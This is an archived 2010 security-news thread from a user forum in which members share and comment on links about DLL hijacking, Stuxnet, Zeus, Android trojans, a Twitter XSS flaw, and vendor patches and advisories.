http://crypto.stanford.edu/~dabo/pubs/abstracts/privatebrowsing.html
Full Paper here: (Nice read, don't miss it...)
http://crypto.stanford.edu/~dabo/pubs/papers/privatebrowsing.pdf
asyn
-
Private-Browsing-Modes - Not that private at all
More:
http://www.bbc.co.uk/news/technology-10891355
http://hphosts.blogspot.com/2010/06/internet-explorer-8-is-inprivate.html
-
Vulnerability in OpenSSL 1.0.x
http://www.h-online.com/security/news/item/Vulnerability-in-OpenSSL-1-0-x-1053147.html
asyn
-
First SMS trojan for Android detected
http://www.kaspersky.com/au/news?id=207576152
asyn
-
Microsoft Security Advisory (2264072)
Elevation of Privilege Using Windows Service Isolation Bypass
https://www.microsoft.com/technet/security/advisory/2264072.mspx
asyn
-
Microsoft Security Advisory (2264072)
Elevation of Privilege Using Windows Service Isolation Bypass
https://www.microsoft.com/technet/security/advisory/2264072.mspx
asyn
Read the Frequently Asked QuestionsIs this a security vulnerability that requires Microsoft to issue a security update?
No. The Windows Service Isolation feature is an optional configuration that some customers may choose to deploy. This feature is not appropriate for all customers. Windows Service Isolation is a defense-in-depth feature and not a proper security boundary and should not be construed as such.
-
Indonesia blocks access to 4 million porn sites
Good move.
http://ibnlive.in.com/news/indonesia-blocks-access-to-4-million-porn-sites/128637-2.html
-
Online Virus Robs 3,000 UK Bank Accounts
http://news.sky.com/skynews/Home/Technology/Computer-Virus-Zeus-V3-Hits-Large-UK-Financial-Institution-And-Bank-Customers-Says-M28-Security-Labs/Article/201008215681025?lpos=Technology_First_Home_Article_Teaser_Region_8&lid=ARTICLE_15681025_Computer_Virus_Zeus_V3_Hits_Large_UK_Financial_Institution_And_Bank_Customers_Says_M28_Security_Labs
-
Don't you just love short URLs ;D
-
Don't you just love short URLs ;D
+1 ;D
-
Botnet attacks SSH servers
http://isc.sans.edu/diary.html?storyid=9370
http://www.malwarecity.com/community/index.php?showtopic=1177
asyn
-
Hi Logos and bob3160,
Here is Pondus link again, now it is fun to click: http://tiny.cc/sd387
polonus
P.S. Check the link because tiny links can also be used for abuse..
-
Botnet attacks SSH servers
http://isc.sans.edu/diary.html?storyid=9370
http://www.malwarecity.com/community/index.php?showtopic=1177
asyn
VirusTotal - linux_sshscan.ex$ - 1/42
http://www.virustotal.com/file-scan/report.html?id=95dda5f750510e0d7d49512b425548d4cb400ddb129d331bdcfaae6f2424566c-1281641251
-
Hi Pondus,
That is frightening, my good friend, I have VTZilla now in the Flock browser, HackTool programs are used to create new users in the list of permitted system visitors, and to delete information from system logs in order to hide the malicious user’s presence on the system. These programs are also used to analyze and collect network packets to carry out specific malicious actions.
Malicious users employ HackTool programs when setting up attacks on local or remote computers. This ELF malware is a command line tool that utilizes the SSH (Secure Shell) exploit vulnerability in Linux. When executed successfully, it enables a remote user t o have full access to the affected system's functions. It can be used to download, and execute possibly-malicious files, upload the user's files, access user accounts and perform administrative commands.
Hope detection of it follows and all files can be scanned successfully,
Damian
-
Hi Logos and bob3160,
Here is Pondus link again, now it is fun to click: http://tiny.cc/sd387
polonus
P.S. Check the link because tiny links can also be used for abuse..
One of the reasons I avoid them like the plague. ;D
-
Hi Logos and bob3160,
Here is Pondus link again, now it is fun to click: http://tiny.cc/sd387
polonus
P.S. Check the link because tiny links can also be used for abuse..
Hi Polonus,
Here (http://news.sky.com/skynews/Home/Technology/Computer-Virus-Zeus-V3-Hits-Large-UK-Financial-Institution-And-Bank-Customers-Says-M28-Security-Labs/Article/201008215681025?lpos=Technology_First_Home_Article_Teaser_Region_8&lid=ARTICLE_15681025_Computer_Virus_Zeus_V3_Hits_Large_UK_Financial_Institution_And_Bank_Customers_Says_M28_Security_Labs) is Pondus link again, now it is fun to click, and hovering over it, you can see where it goes.
[url=Internet address]Link text[/url]
Online security firm M86 Security Labs said the customers were infected with a Trojan virus - which cannot be detected by traditional anti-virus software - while browsing the internet.
The Trojan, known as a Zeus v3, copies the passwords and usernames of customers' online details and transfers their funds to a different account.
It then gives the victim of the virus a false bank balance screen so they are unaware the cash has been taken.
M86 said the virus is potent because it has been carried on legitimate websites located in the UK and not confined to porn and gambling hubs.
Any of the old guard still going to tell us "keep away from dodgy sites and you'll be fine"?
-
First SMS-sending Android Trojan
http://news.cnet.com/8301-27080_3-20013222-245.html
-
A plethora of malware for mobile phones to be expected soon ?
http://norman.com/security_center/security_center_archive/2010/91464/en
Security flaw creates Android, Palm Pre snoop risk
http://www.theregister.co.uk/2010/08/13/smartphone_security_bug/
Free Android antivirus clocks up 2.5m downloads
http://www.theregister.co.uk/2010/08/11/free_android_security_app/
-
Code 9 for kids on the Internet reappears for social networks
http://press.pandasecurity.com/news/code-9-for-kids-on-the-internet-reappears-for-social-networks/
Cracking the code of teens' IM slang
http://news.cnet.com/Cracking-the-code-of-teens-IM-slang/2009-1025_3-6135457.html
-
Server-based botnet floods net with brutish SSH attacks
http://www.theregister.co.uk/2010/08/12/server_based_botnet/
also see reply #636 / #638
-
Details of vulnerabilities in the Palm Pre and Android published
http://www.pcpro.co.uk/news/interviews/360256/q-a-how-we-sliced-open-palm-and-android-security
asyn
-
First SMS-sending Android Trojan
http://news.cnet.com/8301-27080_3-20013222-245.html
Also see Reply #629... ;)
asyn
-
Call to improve password security
http://www.bbc.co.uk/news/technology-10963967
quote:
The growing use of graphics cards as surrogate supercomputers could spell trouble for users of short passwords
-
Stuxnet worm could hijack power plants, refineries
http://news.cnet.com/8301-27080_3-20013545-245.html
-
Well.....not security news but found this very important ... :o ....statistic concerning smart phone
if you have one you may want to switch brand .....or get one if not ;D
Sexual Activity by Smart Phone Brand ....... ;D ;D ;D
http://blog.okcupid.com/index.php/dont-be-ugly-by-accident/
hmmmm........ i wonder if there is a statistic by antivirus brand.....may have to switch if ....... ;D
-
Well.....not security news but found this very important ... :o ....statistic concerning smart phone
if you have one you may want to switch brand .....or get one if not ;D
I don't have a smart phone. ;D
-
Well.....not security news but found this very important ... :o ....statistic concerning smart phone
if you have one you may want to switch brand .....or get one if not ;D
I don't have a smart phone. ;D
in what end of the statistic does that place you......high or low...... ;D
-
don't use Canary (current version, must be 6.0.493) if you got LastPass
updating v8 from 5214 to 5242 causes LastPass SHA256 hashing code to fail
http://code.google.com/p/chromium/issues/detail?id=52096
http://forums.lastpass.com/viewtopic.php?f=14&t=41109&p=151719&sid=aaeed2c35d2af7abb644cee325a6392f
I have no idea if that bug implies a security flaw as well.
-
Trivial forwarding attack on NTLMv2 authentication
http://extendedsubset.com/?p=36
http://www.zdnet.com/blog/security/security-flaws-haunt-ntlmv1-2-challenge-response-protocol/7136
http://www.theregister.co.uk/2010/08/12/ntlm_authentication_still_vulnerable/
asyn
-
Ruby update closes XSS vulnerability
http://www.ruby-lang.org/en/news/2010/08/16/ruby-1-9-1-p430-is-released/
asyn
-
RIM offers Indian government surveillance tools
http://online.wsj.com/article/SB10001424052748703960004575427312899373090.html?mod=WSJEUROPE_hpp_sections_tech
asyn
-
ColdFusion vulnerability more critical than first thought
http://h30507.www3.hp.com/t5/Following-the-White-Rabbit-A/Adobe-ColdFusion-s-Directory-Traversal-Disaster/ba-p/81964
http://www.exploit-db.com/exploits/14641/
http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
asyn
-
Android game secretly transmits GPS coordinates
http://www.symantec.com/connect/blogs/androidostapsnake-watching-your-every-move
asyn
-
The Facebook dislike button scam
http://www.h-online.com/security/news/item/The-Facebook-dislike-button-scam-1060712.html
asyn
-
Government Uses Social Networking Sites for More than Investigations
http://www.eff.org/deeplinks/2010/08/government-monitors-much-more-social-networks
asyn
-
Government Uses Social Networking Sites for More than Investigations
http://www.eff.org/deeplinks/2010/08/government-monitors-much-more-social-networks
asyn
yeah so what...there's nothing surprising, when people agree to disclose aspects of their private life on the net, without restricting access anyway, it is also expected that the cops etc...might get interested ;D
-
Skeletons Hidden in the Linux Closet: r00ting your Linux
http://theinvisiblethings.blogspot.com/2010/08/skeletons-hidden-in-linux-closet.html
asyn
-
Skeletons Hidden in the Linux Closet: r00ting your Linux
http://theinvisiblethings.blogspot.com/2010/08/skeletons-hidden-in-linux-closet.html
asyn
The kernel-level "patch" has been implemented last week by Linus Torvalds, and pushed upstream into recent stable kernels. (http://youfail.org)
-
Due to fake digital signatures (stolen), other antivirus/suites are removing this option from their products.
For instance Comodo (for registered users: https://forums.comodo.com/beta-corner-cis/no-option-for-not-trusting-digitally-signed-applications-t60658.0.html;msg425806#msg425806).
-
Hi malware fighters,
A likewise big hole similar to the LNK-hole or even bigger has been found up for 40 Windows apps together with
the Windows shell and various dll's should be patched for this exploit vector, http://twitter.com/hdmoore/status/21510351207
The cat is out of the b*g, whether this is read like bug or bag!
For the time being one should block TCP ports 139 and 445 and en disable the WebDAV client.
To close the ports use WWDC = Windows Worms Doors Cleaner 1.4 from here:
http://www.dobreprogramy.pl/Windows-Worms-Doors-Cleaner,Program,Windows,11744.html
Windows-Worms-Doors-Cleaner is a very good small program to do this,
polonus
-
Skeletons Hidden in the Linux Closet: r00ting your Linux
http://theinvisiblethings.blogspot.com/2010/08/skeletons-hidden-in-linux-closet.html
asyn
Update #1 - In an email, Joanna Rutowska clarifies that Spengler's exploit targets "some unrelated vulnerability" and her reference to it was in relation to guesses made by Spengler noted in the source code comments.
Update #2 - As Marcus Meissner from the SUSE security team explained to heise Security, SUSE maintainer Andrea Arcangeli provided a fix for the problem in September 2004, but for unknown reasons this fix was not included in the Linux kernel. SUSE itself has the fix and SUSE Linux Enterprise 9, 10 and 11 as well as openSUSE 11.1 through 11.3 do not exhibit this vulnerability.
-
Hi malware fighters,
A likewise big hole similar to the LNK-hole or even bigger has been found up for 40 Windows apps together with
the Windows shell and various dll's should be patched for this exploit vector, http://twitter.com/hdmoore/status/21510351207
Hi polonus,
more info here...
http://www.h-online.com/security/news/item/New-Windows-vulnerability-Applications-download-malicious-code-from-the-net-1062153.html
related info...
http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt
asyn
-
Hi Asyn,
The Metasploit exploit is ready made and waiting on desk, but has not been issued yet, because the exploit has not been revealed so far.
There are many more skeletons around in the MS cupboard. Mind you what vulnerabilities we will see because of the memory adjustments that were applied long way back as the NT 4.0 days,
polonus
-
Hi Asyn,
The Metasploit exploit is ready made and waiting on desk, but has not been issued yet, because the exploit has not been revealed so far.
I'll post any news on that when available, asap.
asyn
-
Hi malware fighters,
A likewise big hole similar to the LNK-hole or even bigger has been found up for 40 Windows apps together with
the Windows shell and various dll's should be patched for this exploit vector, http://twitter.com/hdmoore/status/21510351207
The cat is out of the b*g, whether this is read like bug or bag!
For the time being one should block TCP ports 139 and 445 and en disable the WebDAV client.
To close the ports use WWDC = Windows Worms Doors Cleaner 1.4 from here:
http://www.dobreprogramy.pl/Windows-Worms-Doors-Cleaner,Program,Windows,11744.html
Windows-Worms-Doors-Cleaner is a very good small program to do this,
polonus
Does not work on Windows 7!
-
Adobe releases emergency patches
http://www.theinquirer.net/inquirer/news/1728971/adobe-releases-emergency-patches
-
Hi forum friends,
The newly detected remote binary planting hole in Windows is much more severe than first thought, nearly all applications (220 were tested) are affected: http://news.idg.no/cw/art.cfm?id=8C1F74F0-1A64-67EA-E49A617FAC05584F
Moreover the hole can be exploited quite easily. Most Windows applications use the exploitable functionality so an MS patch will not be a very easy task, moreover patching or changing how the functionality works could break quite some applications. The exploit could have been around for 10 years, and was re-detected: http://www.securityfocus.com/bid/1699/discuss
At the time it was called: Microsoft Windows DLL Search Path Weakness.
http://msdn2.microsoft.com/en-us/library/ms972822.aspx.
The scope of the hole and abusing the exploit: https://deepsec.net/docs/speaker.html#PSLOT33
http://www.juniper.net/security/auto/vulnerabilities/vuln1699.html
A firewall blocking outbound WebDAV traffic (in addition to blocking all
Windows Networking protocols) could stop an Internet-based attack.
How many of these holes are still around in the dark corners of Microsoft's code?,
polonus
-
Scareware tries to trick marks into dropping defences
http://www.theregister.co.uk/2010/08/20/social_engineering_scareware/
and this is the bug
Rogue Turning Retrovirus
http://www.symantec.com/connect/blogs/rogue-turning-retrovirus
-
phpMyAdmin updates close vulnerabilities
http://www.phpmyadmin.net/home_page/security/PMASA-2010-4.php
http://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php
http://www.phpmyadmin.net/home_page/downloads.php
asyn
-
Microsoft warns of DLL vulnerability in applications [More info]
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html
http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx
http://packetstormsecurity.org/NT/audit/NSAGuidePlus.PDF
http://msdn.microsoft.com/en-us/library/ff919712(VS.85).aspx
Scope of DLL security problem widens
http://www.h-online.com/security/news/item/Scope-of-DLL-security-problem-widens-1066444.html
asyn
-
Apple releases Security Update for Mac OS X
http://support.apple.com/kb/HT4312
asyn
-
Apple releases Security Update for Mac OS X
http://support.apple.com/kb/HT4312
asyn
well that's cool ??? ;D
-
Logos,
On the site that came after millw0rm there are already exploits presented for Windows Live Email, uTorrent, Foxit Reader, Microsoft Power Point & Wireshark via DLL-hijacking. Standard Vista and Windows 7 programs are vulnerable: https://twitter.com/avivra/statuses/21994799124 Social engineering became just a bit easier: http://twitter.com/avivra/status/22000389011 Metasploit does all this automatically: https://twitter.com/hdmoore/status/22003840688
MS yesterday presented a tool to prevent loading of libraries of shared network folders: : http://support.microsoft.com/kb/2264107 and a patch, here for Vista: http://www.microsoft.com/downloads/en/confirmation.aspx?familyId=86631d97-ebed-4346-be66-d6ba0f500cea&displayLang=en&pf=true
A good thing avast detects DLL-exploit,
polonus
-
@ Polonus: there was an article about that yesterday (dll hijacking), I got to find it again (I think that was an MS advisory), was mentioning that Firefox was vulnerable too. There's no possible fix with Windows, application developers are strongly advised (by MS) to change "something" in the way their app relates to Windows API, only way to get rid of the vulnerability.
But MS will provide the tools to be used for each OS by third party devs.
http://www.infosecurity-us.com/view/12030/dll-hijacking-bug-hits-microsoft-windows-/
http://www.microsoft.com/technet/security/advisory/2269637.mspx
edit: Avast is or was vulnerable too (I think I read in the forums here that the issue was fixed)
http://vupen.com/english/searchengine.php?keyword=insecure+library+loading
Avast! Antivirus File Opening Insecure Library Loading Vulnerability
http://www.vupen.com/english/advisories/2010/2175
Mozilla Firefox File Opening Insecure Library Loading Vulnerability
http://www.vupen.com/english/advisories/2010/2169
25.08.2010 : Avast! Antivirus File Opening Insecure Library Loading Vulnerability
25.08.2010 : TeamViewer File Opening Insecure Library Loading Vulnerability
25.08.2010 : Microsoft Windows Live Mail Insecure Library Loading Vulnerability
25.08.2010 : VLC Media Player File Opening Insecure Library Loading Vulnerability
25.08.2010 : Adobe Dreamweaver File Opening Insecure Library Loading Vulnerability
25.08.2010 : Adobe Photoshop File Opening Insecure Library Loading Vulnerability
25.08.2010 : Mozilla Firefox File Opening Insecure Library Loading Vulnerability
25.08.2010 : Microsoft Windows Address Book Insecure Library Loading Vulnerability
25.08.2010 : Opera Browser File Opening Insecure Library Loading Vulnerability
25.08.2010 : Microsoft Office PowerPoint Insecure Library Loading Vulnerability
25.08.2010 : Wireshark File Opening Insecure Library Loading Vulnerability
25.08.2010 : uTorrent File Opening Insecure Library Loading Vulnerability
-
the list is getting longer each hour it seems ;D
http://vupen.com/english/searchengine.php?keyword=insecure+library+loading
-
okay it's important to mention that Avast pre-release version is patched, I knew that a patch was mentioned by Vlk in his post about the pre-release:
http://forum.avast.com/index.php?topic=63151.msg533449#msg533449
... but I wasn't sure it was about the same vulnerability. Just got confirmation from Avast that it was actually just that.
-
first rootkit targeting 64 bit Windows
http://forum.avast.com/index.php?topic=63220.msg534244#msg534244
-
I was on a IE tab on firefox and a page just showed up that said:
STOCKPHOTO
you just have been hacked By tun hacker
hacked by Number 7. Tn.Spamer
contact; an.7@live.fr greetz: tun hackers~~underground people
I really need help because I don't know what to do. I unplugged the ethernet cable to the desktop. I hope this laptop is not affected.
HELP!!!!HELP!!!!!PLEASE,PLEASE,PLEASE!!!!!!!!!!!
-
I was on a IE tab on firefox and a page just showed up that said:
STOCKPHOTO
you just have been hacked By tun hacker
hacked by Number 7. Tn.Spamer
contact; an.7@live.fr greetz: tun hackers~~underground people
I really need help because I don't know what to do. I unplugged the ethernet cable to the desktop. I hope this laptop is not affected.
HELP!!!!HELP!!!!!PLEASE,PLEASE,PLEASE!!!!!!!!!!!
this is not a help thread. Why did you post here ???
-
Hi malware fighters,
Autorun DLL Hijacker usb stick: http://www.attackvector.org/autorun-dll-hijacker-usb-stick/
One day attackers will also use malicious pop-ups, just wait and see,
polonus
-
Outbreak: Fake Fedex Tracking Number emails carry malware
http://origin-www.sophos.com/blogs/gc/g/2010/08/26/outbreak-fake-fedex-tracking-number-emails-carry-malware/
-
Outbreak: Fake Fedex Tracking Number emails carry malware
http://origin-www.sophos.com/blogs/gc/g/2010/08/26/outbreak-fake-fedex-tracking-number-emails-carry-malware/
Not new at all.
I have had these in various guises for ages now...
(one thing I still don't get is that the email says it is to someone with a completely different email address and yet it still comes to me... ???)
http://forum.avast.com/index.php?topic=59388.msg500590#msg500590
-
@ spg SCOTT
See Bcc:Blind carbon copy
In the context of correspondence, blind carbon copy (abbreviated Bcc:) refers to the practice of sending a message to multiple recipients in such a way that conceals individual email addresses (mentioned in "to" field of the mail) from the complete list of recipients.
http://en.wikipedia.org/wiki/Blind_carbon_copy
-
<snip>
Not new at all.
I have had these in various guises for ages now...
(one thing I still don't get is that the email says it is to someone with a completely different email address and yet it still comes to me... ???)
<snip>
That should be the biggest clue of all that it is a fake as a legit copy would be directly addressed to the customer to whom the invoice/tracking number, etc. consignment is for.
But the spammers aren't going to send out spam to individual addresses but to groups of addresses.
-
Attackers exploit DLL vulnerability in Office and other applications
http://isc.sans.edu/diary.html?storyid=9445
asyn
-
Hi malware fighters,
How tracking cookies are being preserved inside IE, while the user want to delete them at close down of the browser:
http://ha.ckers.org/blog/20100827/ie-cookies/
IE does not handle cookies always with the browser user in mind,
polonus
-
IE does not handle cookies always with the browser user in mind,
polonus
Yes D., true..!
That's just one of the reasons why I never would use it...
Btw., Ccleaner does a good job here. ;)
asyn
-
IE does not handle cookies always with the browser user in mind,
polonus
Yes D., true..!
That's just one of the reasons why I never would use it...
Btw., Ccleaner does a good job here. ;)
asyn
Also for Firefox. ;)
-
Once-prolific Pushdo botnet crippled
http://www.theregister.co.uk/2010/08/27/pushdo_botnet_crippled/
M86 security labs
http://labs.m86security.com/2010/08/pushdo-spambot-crippled/
Brian Krebs - Takedowns: The Shuns and Stuns That Take the Fight to the Enemy
http://www.mcafee.com/us/local_content/misc/threat_center/articles/summer2010/msj_article02_take_the_fight_to_the_enemy.pdf
-
Hi mkis,
Yes Pushbot was infiltrated, but it seems that the C&C servers are being specifically protected by Chinese and American hosting firms, so the perpetrators will keep a low profile for a while and then to continue their activities: http://blog.fireeye.com/research/2010/08/infiltrating-pushdo-part-2.html
So this time they were saved by their own back-up C&C-servers. Hard to understand why the various governments (USA, Europe, Russia, China) did not close down the hosting firms of aforementioned back-up C&C servers or they must have a serious interest not to take action?
polonus
-
Hard to understand why the various governments (USA, Europe, Russia, China) did not close down the hosting firms of aforementioned back-up C&C servers or they must have a serious interest not to take action?
polonus
Big Gov's intelligence sectors love dipping fingers into black market. They maybe (I say MAYBE ;))have vested interest/money in keeping them going.
But it might just be good old bureaucratic "red tape" also. Don't know about abroad, but in the states you could tell the Fed. Govt. their pants are on fire, they would have to fill out 20 different requisition forms to request first a fire extinguisher, then more forms for what type, weight, etc. All the while with pants still burning.
-
Hi malware fighters,
Just in a new DLL-Hijacking exploit, this time for Fx: http://www.exploit-db.com/exploits/14730/
They keep them coming,
Detect vulnerable Windows apps within 25 to 30 minutes with this free tool: https://www.metasploit.com/redmine/projects/framework/repository/raw/external/source/DLLHijackAuditKit.zip
polonus
-
Detect vulnerable Windows apps within 25 to 30 minutes with this free tool: https://www.metasploit.com/redmine/projects/framework/repository/raw/external/source/DLLHijackAuditKit.zip
polonus
What I see Internet Explorer cannot display the webpage
I guess Fx is being exploited now.
-
It isn't a web page, but a zip file to be downloaded, so I rather doubt you could display it in any browser.
Most browsers would recognise it isn't a web page and download the file (depending on your settings) or pop-up a download window.
Mine recognised it as a zip file and downloaded it as per my settings.
So firefox isn't being exploited, rather IE can't seem to deal with a download link.
-
Detect vulnerable Windows apps within 25 to 30 minutes with this free tool: https://www.metasploit.com/redmine/projects/framework/repository/raw/external/source/DLLHijackAuditKit.zip
polonus
What I see Internet Explorer cannot display the webpage
I guess Fx is being exploited now.
The link actually crashed IE 8 so I guess it's IE8 that has a problem.
Copying the link opened Gigaget (download manager) which had no problems downloading the .zip file
Chrome also had no problems handling the link posted. :)
-
Detect vulnerable Windows apps within 25 to 30 minutes with this free tool: https://www.metasploit.com/redmine/projects/framework/repository/raw/external/source/DLLHijackAuditKit.zip
polonus
What I see Internet Explorer cannot display the webpage
I guess Fx is being exploited now.
The link actually crashed IE 8 so I guess it's IE8 that has a problem.
Copying the link opened Gigaget (download manager) which had no problems downloading the .zip file
Chrome also had no problems handling the link posted. :)
???
-
Microsoft tool for DLL vulnerability interferes with some applications
http://www.h-online.com/open/news/item/Microsoft-tool-for-DLL-vulnerability-interferes-with-some-applications-1069540.html
asyn
-
Apple QuickTime backdoor creates code-execution peril / Getting punked by 9-year-old parameter
http://www.theregister.co.uk/2010/08/30/apple_quicktime_critical_vuln/
-
Apple QuickTime backdoor creates code-execution peril / Getting punked by 9-year-old parameter
http://www.theregister.co.uk/2010/08/30/apple_quicktime_critical_vuln/
Detailed Info here:
http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1
asyn
-
Apple QuickTime backdoor creates code-execution peril / Getting punked by 9-year-old parameter
http://www.theregister.co.uk/2010/08/30/apple_quicktime_critical_vuln/
Detailed Info here:
http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1
asyn
my quicktime install just got an automatic update, so may be it fixed that...
-
Hi malware fighters,
0-days will be found here during all of this month: http://www.exploit-db.com/
polonus
-
Microsoft tool for DLL vulnerability interferes with some applications
http://www.h-online.com/open/news/item/Microsoft-tool-for-DLL-vulnerability-interferes-with-some-applications-1069540.html
asyn
Microsoft continues to workaround DLL vulnerability
http://blogs.technet.com/b/srd/archive/2010/08/31/an-update-on-the-dll-preloading-remote-attack-vector.aspx
asyn
-
Hackers blind quantum cryptographers
http://www.nature.com/news/2010/100829/full/news.2010.436.html
Hacking commercial quantum cryptography systems by tailored bright illumination
http://www.nature.com/nphoton/journal/vaop/ncurrent/full/nphoton.2010.214.html
Number of vulnerabilities on the rise
http://www.norman.com/security_center/security_center_archive/2010/91886/en
-
Thanks Pondus,
Google Code removed 50 malware after being alerted they were on their servers: http://threatpost.com/en_us/blogs/google-code-discovered-serving-malware-090110
polonus
-
It would be nice if they took a pro-active response to this type of thing, rather than a reactive response waiting for someone to tell them.
-
Hi DavidR,
A bit like a sort of Pontius Pilate comment by Google's, also seen from their official policy "Google actively works to protect our users from malware. Using Google Code, or any of our products, for distribution or coordination of malware is a violation of our product policies, and we will remove any projects discovered to be used for these purposes," a Google spokesman responded in an e-mail message to Threatpost.com."
pol
-
MS probes mystery IE bug
http://www.theregister.co.uk/2010/09/06/mystery_ie_bug/
Microsoft is investigating reports of a new bug in Internet Explorer.
Redmond's Security Response Team (MSRT) said on Friday that it was aware of a "publicly disclosed issue involving Internet Explorer", and promised an investigation, without going into details.
Circumstantial evidence suggests Microsoft is referring to a post by security researcher Chris Evans, of Google, to a Full Disclosure mailing list on Friday, hours before MSRT's tweet.
"A nasty vulnerability exists in the latest Internet Explorer 8," Evans wrote. "I have been unsuccessful in persuading the vendor to issue a fix."
"The bug permits — for example — an arbitrary web site to force the victim to make tweets," he added.
http://twitter.com/msftsecresponse/status/22934606564
(see the article from the register to get the link to the full description, as I'd rather not post this link here)
-
1) Mozilla Patches Firefox DLL Load Hijacking Bug (http://threatpost.com/en_us/blogs/mozilla-patches-firefox-dll-load-hijacking-bug-090810?utm_source=Newsletter_090810&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=)
2) Apple Plugs Safari Drive-by Download Security Holes (http://threatpost.com/en_us/blogs/apple-plugs-safari-drive-download-security-holes-090810?utm_source=Newsletter_090810&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=)
3) Facebook Apps Pump Out Mobile "Entertainment" Spam (http://threatpost.com/en_us/blogs/facebook-apps-pump-out-mobile-entertainment-spam-090710?utm_source=Newsletter_090810&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=)
-
Updated Android Trojan Pushed in SEO Attacks
http://threatpost.com/en_us/blogs/updated-android-trojan-gets-mob-backing-090810?utm_source=Threatpost&utm_medium=Tabs&utm_campaign=Today's+Most+Popular
-
Beware of Link: E-Mail Virus Plays Havoc With Internet
An e-mail virus swept through the Internet Thursday, snarling traffic and taking down servers at ABC, NASA, Comcast, and Google -- and possibly even affecting the Department of Homeland Security.
http://www.foxnews.com/scitech/2010/09/09/beware-link-e-mail-virus-plays-havoc-internet/?test=latestnews
-
Hi folks,
Hackers target and exploit Pirate bay's Adserver. Also big sites using OpenX were apparently being hacked: http://torrentfreak.com/hackers-target-and-exploit-pirate-bay-ad-server-100913/
pol
-
Old vulnerability in Apple's QuickTime Player allows remote code execution for Windows systems (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/91862/en
About the security content of QuickTime 7.6.8
http://support.apple.com/kb/HT4339
-
Old vulnerability in Apple's QuickTime Player allows remote code execution for Windows systems (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/91862/en
About the security content of QuickTime 7.6.8
http://support.apple.com/kb/HT4339
Key statementUpdate 16 September 2010
Apple has published QuickTime version 7.6.8. This update fixes the vulnerability mentioned above as well as another vulnerability in previous QuickTime versions.
I have version 7.68.75.0
-
Update to Mozilla Firefox solves several critical vulnerabilities (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/91922/en
-
ZoneAlarm scares users with "virus alert"
http://www.h-online.com/security/news/item/ZoneAlarm-scares-users-with-virus-alert-1082474.html
asyn
-
I know you've been on vacation Asyn and we discussed that subject while you where enjoying yourself. ;D
http://forum.avast.com/index.php?topic=64019.0 (http://forum.avast.com/index.php?topic=64019.0)
-
I know you've been on vacation Asyn and we discussed that subject while you where enjoying yourself. ;D
Thanks for the hint, Bob - sorry for being late..! ;)
asyn
-
ZoneAlarm slammed for scarewarey marketing ( Warning! Er, buy this anti-virus )
http://www.theregister.co.uk/2010/09/20/zonealarm_scareware_flap/
Check Point defends ZoneAlarm scareware-style warning ( 'We didn't want to scare anybody' )
http://www.theregister.co.uk/2010/09/21/zonealarm_defends_controversial_malware_warning/
Check Point kills scareware-style pop-up campaign ( Waves white flag )
http://www.theregister.co.uk/2010/09/21/check_point_pop_up_row_climb_down/
-
Nothing like shooting yourself in the (public relations) foot.
-
It's deeply lamentable the attitude of ZA.
-
agreed, these are almost rogue-like methods ::)
-
Twitter Hack Activates Pop-Ups, Sends Some to Porn Sites
DEVELOPING: Hackers exploited a security flaw on the popular micro-blogging site Twitter, retweeting malicious code, activating pop-ups, and even exposing users to an unwanted sight: hard-core pornography.
As of 9:50 a.m. EST, a post to Twitter's status blog said that the security flaw had been fixed, simply stating "The exploit is fully patched." This confirms what a spokesperson for the company told popular tech news site Mashable ten minutes later: “It should now be fully patched and is no longer exploitable.”
http://www.foxnews.com/scitech/2010/09/21/twitter-mouseover-security-flaw-porn/
-
yeah about this new twitter hack, use a twitter client until you are a hundred percent sure that the issue has been fixed, clients like tweetdeck etc...are not affected, ie hovering over a hacked tweet in a client won't have any effect, like in does from the web (original twitter in browser) interface.
-
Twitter Hack Activates Pop-Ups, Sends Some to Porn Sites
Users wishing to protect themselves should either disable JavaScript or install an extension such as NoScript to selectively block JavaScript on a per site basis.
More info for the interested...:
http://www.securelist.com/en/blog/2297/Live_Twitter_XSS
http://www.sophos.com/blogs/gc/g/2010/09/21/twitter-onmouseover-security-flaw-widely-exploited/
http://status.twitter.com/post/1161435117/xss-attack-identified-and-patched
asyn
-
Hi Asyn,
Users of GoogleChrome can use NotScript extension for GoogleChrome to do something similar,
polonus
-
How to protect yourself from Facebook Places
http://www.sophos.com/blogs/gc/g/2010/09/17/protect-facebook-places/
-
EMI Music servers hacked:
http://blog.unmaskparasites.com/2010/09/25/emi-server-hacked/
It would appear that avast! catches the redirect:
http://www.virustotal.com/file-scan/report.html?id=b361fdbff12cf314aea988161a5fa132516c06d5bf89a843e5aa74f43a427df1-1285526196
(txt.file with the iframe in it)
Would be nice to know if the network shield detects...
-
they say the issue is "solved now", but still:
Malicious Links on Twitter
A malicious link is making the rounds that will post a tweet to your account when clicked on. Twitter has disabled the link, and is currently resolving the issue.
UPDATE Sun Sep 26 18:41:49 UTC 2010: We’ve fixed the exploit and are in the process of removing the offending Tweets.
http://status.twitter.com/post/1192873885/malicious-links-on-twitter
they need to take care of the exploit, not just disable links ;D ...but I guess they're on it.
http://twitter.com/twitter/statuses/25615345589
-
Computer Worm Affects Computers at Iran's First Nuclear Power Station
TEHRAN, Iran -- A complex computer worm capable of seizing control of industrial plants has affected the personal computers of staff working at Iran's first nuclear power station weeks before the facility is to go online, the official news agency reported Sunday.
http://www.foxnews.com/world/2010/09/26/worm-affects-computers-irans-nuclear-power-station/
-
Computer Worm Affects Computers at Iran's First Nuclear Power Station
It's Stuxnet..! ;)
More info here: http://forum.avast.com/index.php?topic=63221.msg544033#msg544033
asyn
-
not a warning, but a security tip (not sure if it fits in this thread):
'Rickroll' protection hits Firefox in add-on form
http://news.cnet.com/8301-27076_3-20017569-248.html
https://addons.mozilla.org/en-US/firefox/addon/230353/
("This add-on has not been reviewed by Mozilla.")
-
